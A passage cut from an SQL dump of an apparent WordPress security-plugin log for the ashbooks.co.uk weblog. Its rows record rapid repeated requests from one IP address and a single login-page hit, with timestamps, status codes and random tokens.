.0982,100,'AgFZXJc4N5LGdEWjw6vqYu1r','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215926.1398,100,'5UpYhoSWlTdEQFHLwnM9uKDa','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215928.0024,100,'rPA8NE2xUy3tMf1IoOuKbFSC','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215929.6834,100,'CdjbY2PLt7h4fvW8uIOq9msx','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215931.2915,100,'8aWNhnpd35ukCgZ4xsrDMvmB','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215933.0793,100,'YgnXThOq3WCk2RMfrcIFZ4G8','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215934.9584,100,'9LH7ZGqTXURS4coK6inQBjyt','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215936.6929,100,'8oVKvad5J06AwYg9eEFxINqL','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215938.0778,100,'PfZk3QFeAsGuqITh0cHmltgD','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215939.7835,100,'ybkeY3gN9UESiwmcnMvPxzrW','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215948.8567,100,'ZiEcjoWeABX1uLy9CItkxfV2','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215950.8561,100,'AG25ZRStIrpfoOs9643vhbyE','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215952.9674,100,'aJg0obCdeDczS8s1lRYOH65f','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215954.5121,100,'HlF3Nr9gVUe8f4cztiZjLDKW','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215956.3718,100,'4nzOgBqtmQrvTI1UGfLJaxZc','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215958.2007,100,'7opQr4t8im0u2TkgZJ1vWdNs','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215959.7750,100,'qWG2XRcDn3xSfYP1o90lgmK4','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215961.5393,100,'pr60xVsoQtbWnSwA8YOGkmeL','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215963.9800,100,'7pMbAQP9XJ4ZYijmDuVTsyF8','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215965.5516,100,'SCDTqxUJwmKLFRZ7yhQfrsGa','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215979.6282,18,'7Y0fHeL9GmlnUSBwa4zIVD6P','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215981.1436,18,'4LIM8R1BjDKqYZymhi2HuOwT','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215983.2147,18,'d450C3pmay9HP7f6zviqwb2E','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215984.9400,18,'G4wWQNbEzUR7t8jMVlF2yo1T','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215988.7013,18,'cThzxvoYPjtmGk8SuH3gWyVM','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215990.6282,18,'3Qx4pNjTFwl2ZoAO75WcKy6r','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215992.3135,18,'OcIBpJ4tT7EnLag59q8dZkXv','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215993.5419,18,'2HEdiCZQv68ANkJgly09q14W','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215994.7987,18,'E9nSudRgxLcFwPK7rWGUy3AQ','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215996.1605,18,'CYQfN62EpVKeqXx1awZPF3jW','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215997.9249,18,'UQsjPpM0hvJklYGrAnaBKft3','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215999.1868,18,'B4whS2WjMgaHpPqnICibQmsF','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216000.6959,18,'WZ2DVM8Ob1Qnz7oCNAgHkUBu','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216002.0317,18,'uKIUjDayqtfGVH71vkz0icSC','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216003.3453,18,'Zv2ipJT9Mma3PCNQGdhWwAID','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216004.0448,18,'KBZqNMvPcAmLauey0oOn6351','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216005.0465,18,'2oCtlkEzvHVK7ei5NGL3wJWD','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216006.0419,18,'DybgPO2LeFZEGf7JndzlU3IK','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216006.8898,18,'ZTu8v3VPNoIrd64Sn2MYgFwf','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216007.8472,18,'9cFSUa4tiu6DN2ZHKkXTh5lI','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216009.1639,18,'ZCgiFOGmcE8Q0tWKkToud6Yz','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216010.7508,18,'mIvGReXKqFlToEkJdjgOQ6ys','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216012.0265,18,'6LCu3VozHstnRGmqwh247DBl','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216013.5074,18,'VTb2gHSfZOUvRMsDJuFe1ny0','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216014.5966,18,'eWSHqMm6iVNycup0rXhBkwx2','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216015.9842,18,'U6lZ3pWzqdXVP2N4mGCtckxu','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216017.1187,18,'BPWMCEv1Xr9SUA5cFgnm6Nj7','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216018.6655,18,'wMzTHeNcyXoblhKDZQrk0AuL','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216020.1432,18,'jm05BdVIGxi1veR8uyZoscp2','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216021.4423,18,'EvfBCKSJ67ePkRuYVGUmQLtI','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216022.6617,18,'mb3lGpFONQTYxSZA5LoH8fEv','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216024.4348,18,'QITMfUkSx4hFWeNOw1BPA9m3','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216025.7320,18,'KxE9nZCiLgFrDcYPAfyXSdBk','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216026.8601,18,'dTtqSoIekf6nB1P0shAZvKcr','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216027.9503,18,'6n8UHh4AcXeKTVP5Q1zJtWom','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216029.1724,18,'ymjHU7IxEzfgROAusoLd4iNF','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216029.9978,18,'RizejufKom5r3lQbFvJUDpG9','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216031.0791,18,'qwvkWQJZAjO6BbpRL4mIX97C','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216032.4607,18,'MwESKVLcfqk82joThe5vXCG4','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216034.4970,18,'5Gjyb9mKF6TMpP0c2YkhUXWa','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216035.5958,18,'16tZhwGVOmpodFevYqDQAkgx','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216036.9524,18,'17iy4uZaWrRxdXqcjA3CN6U0','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216038.1388,18,'wUElkoiXCdP0658uKxBnfRAN','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216039.5425,18,'n7m4Hr6lDvFhUXpwuiBVAys3','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216040.8723,18,'K7Pdsv5YuBLmTG98ctlHpaeq','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216042.0657,18,'cBiHQGNOIpCRZT3dkeYh5tAg','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216043.4321,18,'zLNR4G6puJX0PVojcrEk3UlY','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216044.6941,18,'cCWHX1Tpv6AVnujR9LJyQlGY','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216045.9394,18,'WaQJ5KUptfz2mlOynuoPSx7i','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216047.2252,18,'aMXv50slpZDnfhJFO7bI62LG','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216048.5426,18,'FTfRcS4EO7LqVmDCaWsdygZe','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216049.9451,18,'ah7zyM51LQ2lPbw3mXZnGjSH','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216051.3561,18,'TzmboyArtfiJE2RMa7hVxUd8','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216053.0196,18,'dpk9aXVBrtxF01Zc56TC7qPK','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216054.7181,18,'oGOq1pWLhNPtMrY8jmvkSHbF','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216056.3474,18,'m2vA6OYj5GeLNzxt9o8UQqpn','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216057.6663,18,'809prLMA2ylODh1xcgQ5SvXK','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216059.2999,18,'QF8cHGWid6qrVXl2zemYDsuC','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216061.1260,18,'uMUKCZx4imkBdH2EcXw5hysD','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216062.0838,18,'pjTlF5HkmrOzeVf9ugP2Q0aS','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216063.3592,18,'j3DB4zeW9XASIo81R7UNkPHy','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216065.0397,18,'uGxWl9pfzVjqT5cFLwt3IQm0','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216066.5225,18,'pSin4HdusokrOq9VKYhlwUvJ','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216067.7274,18,'97BDXvYnxbEk6Gmdo8ih1Su0','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216069.1023,18,'oJtkzILsnmA3W1dBwGX8e06c','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216070.1640,18,'62gNcWuzTwbSD7yvMirORlhx','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216070.9383,18,'UBAC8mXliEM2qw0NhjroGt1f','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216072.3858,18,'WxgP5fsFJpyRkuNaBIon3CEX','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216073.7910,18,'GCVQBa3E65hWqv9pjoRJOynu','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216075.0807,18,'QEkPwsdYt9bCUpcKAW3jfZ5a','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216076.4923,18,'Oqg9PwAh7kMxUSNlWdHFstLR','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216077.8823,18,'WxjNfwF4zvOXSnJ0yAo7K8DH','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216079.6449,18,'lFp6YsNuh0MgdHtKfW91yCzV','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216081.2845,18,'nMe0EcJGq5uAxoF3U6BT92hC','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216082.4527,18,'URbnMTuvcYLSqwilDVpErdN1','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216083.5897,18,'mtvXGfwk2L8H9eSgxpQDdh4U','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216084.7493,18,'6h3Td8ZrtHboCkN0QqPXiBJa','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216087.0262,18,'au2ZHeM0BXlxdjAfNpy5wKi8','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216088.3439,18,'eolBj9XpbKqUTNtWEIVZ74x8','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216089.6347,18,'EbI8CNmZxfnhQW35qjAsYv9g','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216090.6230,18,'j1BAHf5GrCJq4703mwZxpyl9','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216091.6142,18,'0qXZbfgwrkEOHCMWnmV341RN','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216092.9442,18,'UEAwqGdy3t1jT8ZgBV6RreJs','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216094.3455,18,'j4aFWRmE9LrzB1u32lYDU0gp','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216095.5072,18,'9trGAvLIP0caFiXJdke615Zy','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216097.4261,18,'pg0xEHwDVIdhks6KoFbRLX2A','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216098.5598,18,'oWk2cg49AdRiwPeOHJrVv5nZ','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216099.8459,18,'7q4huofcNbX9ixkyzTjApBUa','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216100.9629,18,'T82BuHPVFgo4hjKOI19mr5b6','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216102.3134,18,'eMKUHytBJTvP2QCzcjrq7oua','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216103.9020,18,'vCrzSUTtuoi6XcB8jJfhE4LI','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216105.0971,18,'HmPwrvGjNURSxCy5JoeuQ3hO','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216106.4073,18,'oA2tf83KiQvSlMZ7DrPwsTeg','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216107.4602,18,'RYcvdiNfb3Lj6nmTJSMFAaC5','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216108.7850,18,'AlDFejb2z3osNW8BSdfgv6Oh','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216109.8906,18,'msEgyw92WULZc617ApMeVuCl','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216111.3020,18,'1pILojg3RcmVyi9WxUETJea8','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216113.2525,18,'bnHeXS793OpuN6JmcjBQviCz','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216114.5715,18,'Cwr1RKV2IcHpahAuibMldSf9','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216116.4333,18,'8EjlfUFzy9A1uKMcVgmT5aN3','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216117.9345,18,'xrQg1vERF3eUzhXM5uk6c4aY','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216119.1108,18,'oAnt8xi9Wp0cXDhNj4PIsBUr','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216120.5170,18,'XZ5bCBWclnYh79v2jJAaTSEH','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216122.2931,18,'EYsRPb6NtjGSgqz8QCi2HXxk','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216123.4977,18,'uePC6Q32DZJtdYjBsUxVIvLK','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216124.9176,18,'W1CxbBrl69DTPgKkSFU7JOdV','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216126.3922,18,'QwEzHr4clBRv7Y5S9NneLhGm','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216127.5939,18,'293ZDCEzpSo4rYi1bN06Gdsa','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216128.7979,18,'XTyGEhp6D897aOUjBtPlY1HZ','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216130.0951,18,'JMrAY4jGcVilZnWm63qvf1X5','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216131.0976,18,'6IlLMYXjtEihoqdWTzgpaQ4D','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216132.7381,18,'QYWDslVrBez8pCZUxm1NbcG6','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216134.4755,18,'hQJ4MlUkqF5DzH9fP2grteEO','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216136.2973,18,'AUuG2SsDMm7ktlWbyK3CZc1f','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216137.5565,18,'DvrymGPKMqb38scOfoud5hj0','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216138.9001,18,'IdqiTPBCz9DHkYgh3jmcnEyL','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216140.0850,18,'InprbCyAkRh3iPKEXv1qJcB4','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216141.6192,18,'HuqeO0zlxWZ2n3bRw6GSo9Lr','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216143.0085,18,'pJUDHeQEWVswfucABz2PtlKx','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216144.7418,18,'WzTYsSex1icbVF7LI50nHmgE','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216145.9719,18,'ZbUaEHv8nTLAGjFWCYoec3rq','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216147.2390,18,'ziM2hfuyl91ZKNLgjpAkSGY7','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216149.0852,18,'db6pO894X2jcMLF1YTVCsqao','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216150.7598,18,'BKCRp1Qhuwg7jdoyU9TYEzAl','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216152.2195,18,'n7yoXbDl2rFpxvHc6z0gZUes','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216153.4227,18,'oMbU37dk5gAhQaTFz4rj8esB','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216155.0849,18,'sBAt3HD5vmNnL4Ve0p1oEaRx','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216156.3286,18,'4vNTm1t8XUspMBlEfeconF5S','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216157.9825,18,'vgPKjJsBkwanlNdUbWT0qRuZ','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216159.3712,18,'uv3HlwG8nWJbjkPXRQczFAfS','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216161.7956,18,'TNgcitW5HVZQmI1JzhXlwkGd','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216162.9820,18,'KEet5kOdMpX9zHbvlJ78VqnI','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216164.0962,18,'mwfnW2p3yS7uHQDctdvIE8Ti','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216165.3080,18,'IzPEH7MO1tjYLQU4W2np5exv','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216167.0633,18,'jFkYeKr0vtEzOZSRVwUXclM9','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216169.0665,18,'lmIX5UecF3Z6KVLz1nbPdOCH','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216170.4490,18,'OSJVZQNirAfampC04h7s6FDK','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216172.1620,18,'axnOdi3AvjHbgYMXpfP25JhQ','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216174.7119,18,'ylKWCpw9ukO0m4erfoDEjHRU','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216176.2125,18,'6cn0pGUt78XvYEa2S14qRWMP','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216177.9958,18,'WmPvozknGfZ3Y5NXTVDlu9jR','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216179.3430,18,'gO2b1klnTzmiE5XLotBfFuSh','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216181.0083,18,'mGN7aRICwjqAgzTY1QcFtHZL','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('69.30.217.109',1159649645,'ashbooks',0,1637216182.5261,51,'rFMoPflhcD2sYVHAyedWKngI','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('141.98.83.79',2372031311,'',0,1637216182.6267,18,'0mANfO6xwqdbkpvKCTBgDjYl','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216183.8621,18,'likTaqv8bOEYsVzgCZNue1p4','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216184.9108,18,'eHTuj3vDzdy2ax7tnJWrKsZ6','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216186.3904,18,'A5ELoQZ7BjXD9kJy8KMIexda','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216187.5381,18,'mY7Bqk4W6ulcAtdMPoXwvZpI','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216188.7494,18,'GWyp1aVxQnAO0KHRiZzEvTNF','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216189.8801,18,'Vkdx0OyGF3McgaN4hZ1IEeDA','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216191.3096,18,'ryGwNsHmb1zAF8Wlgdk275Ut','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216193.1130,18,'9NmuXnKwZbovM2VHEepdP1ik','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216194.6670,18,'sldDUbLiqCT6ogxZJjazfmkM','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216196.2263,18,'hvXre06czRJjmMFTyUD4qEbA','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216198.2013,18,'oiqRQCyzjXsBNcK5kOEVYxZd','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216199.5028,18,'Z6pIn9iV7sBw4NQHmXfrUOTE','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216201.1163,18,'5diGZuh0LHc6tpMNvSAWy39n','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216202.4143,18,'XydkWErZzvqN3pTCwiKIAo57','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216203.5330,18,'xyfZARw87v6cBeCVgq5IL2SE','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216205.2193,18,'WbYt8vpLDQARCHu306kdhzwU','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216206.7156,18,'n4ZsAmxqJoGITh6vMuSP5LW8','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216207.8503,18,'M9OETRLdZKSfg1APCocFqpy8','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216209.0218,18,'SuWINrsP9xlGCMTnLkj84gyR','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216210.7370,18,'d9rhfJI8PBsuoMjUSWQ3yGKN','','13|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637216212.0000,18,'ai4cbSGzpyWJ2ZTt1oC